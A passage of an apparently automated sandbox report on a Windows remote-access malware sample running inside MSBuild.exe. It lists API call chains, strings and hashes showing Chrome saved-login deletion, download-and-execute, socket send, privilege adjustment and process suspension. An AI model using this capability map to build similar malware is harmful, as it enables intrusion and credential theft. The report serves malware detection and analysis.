                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1286116820-1979702588
                                                                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
Strings
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
• [Chrome StoredLogins not found], xrefs: 0040B27B
• UserProfile, xrefs: 0040B227
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
• Opcode ID: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
• Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
• Opcode Fuzzy Hash: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
• Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
• OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
• GetLastError.KERNEL32 ref: 00416B02
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
• Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
• Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
• Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
APIs
• __EH_prolog.LIBCMT ref: 004089AE
  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,00F1A798,00000010), ref: 004042A5
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
• FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002C4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(000002C4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
• String ID:
• API String ID: 4043647387-0
• Opcode ID: ea13f7683f6f091a77670021696f9811019f57dab70408bb2bf5d7a912ed8442
• Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
• Opcode Fuzzy Hash: ea13f7683f6f091a77670021696f9811019f57dab70408bb2bf5d7a912ed8442
• Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
• Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
• Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
• Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
• _wcschr.LIBVCRUNTIME ref: 00450BF1
• _wcschr.LIBVCRUNTIME ref: 00450BFF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID: u;~/
• API String ID: 4212172061-1979702588
• Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
• Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
• Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
• Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
APIs
  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
• ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
• GetProcAddress.KERNEL32(00000000), ref: 00415977
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: PowrProf.dll$SetSuspendState
• API String ID: 1589313981-1420736420
• Opcode ID: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
• Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
• Opcode Fuzzy Hash: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
• Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
• GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
• LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
• LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
• SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
Strings
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
APIs
• __EH_prolog.LIBCMT ref: 00407A91
• FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
Strings
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
• API String ID: 2825088817-2582742282
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Strings
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID: u;~/
• API String ID: 2829624132-1979702588
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Strings
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: x@G$x@G
• API String ID: 4113138495-3390264752
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Strings
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
Strings
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: u;~/
• API String ID: 3906539128-1979702588
APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 301083792-0
                                                                                                                                            • Opcode ID: 829a012926602753b85214bc65812e7bf9034f67f78a7fa4532cc8a33c3093e2
                                                                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                            • Opcode Fuzzy Hash: 829a012926602753b85214bc65812e7bf9034f67f78a7fa4532cc8a33c3093e2
                                                                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$u;~/
                                                                                                                                            • API String ID: 0-966075249
                                                                                                                                            • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                            • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                                                            • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                            • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID: GetLocaleInfoEx$u;~/
                                                                                                                                            • API String ID: 2299586839-1397266105
                                                                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                            • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                            • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                            • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                            • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                            • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                            • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                            • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                            • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                                                                            • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1999457699-0
                                                                                                                                            • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                            • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                                                                            • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                            • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                                                                            • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseHandleOpenResume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3614150671-0
                                                                                                                                            • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                            • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                                                                            • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                            • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .
                                                                                                                                            • API String ID: 0-248832578
                                                                                                                                            • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                            • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                            • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
